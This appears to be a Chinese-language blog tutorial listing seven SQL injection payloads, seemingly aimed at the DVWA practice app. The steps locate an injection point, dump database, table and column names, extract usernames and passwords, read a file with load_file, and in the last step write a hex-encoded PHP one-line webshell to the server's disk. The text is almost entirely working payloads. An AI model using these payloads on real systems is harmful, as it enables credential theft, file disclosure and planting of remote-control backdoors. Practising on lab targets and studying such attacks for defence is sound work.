1、使用单引号判断是否有注入点(报错说明存在注入点)
2、查询正在使用中的用户user、数据库(%27union%20select%20user(),database()+--+%20)
3、爆数据库所有表名('UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema=0x64767761+--+&Submit=Submit#)
4、爆user表下所有字段名“0x7573657273转码后是users”('UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273+--+&Submit=Submit#)
5、查询列名user、password下的所有用户名和密码('UNION SELECT user,password from users+--+&Submit=Submit#)
6、加载C盘根目录下的root.ini文件('UNION SELECT 1,load_file('c:\\root.ini')+--+&Submit=Submit#)
7、一句话木马,在C盘根目录生成muma.php的木马文件(' union select 0x3C3F70687020406576616C28245F504F53545B2763686F70706572275D293B3F3E,2 into outfile 'c:/muma.php'+--+&Submit=Submit#)











网友评论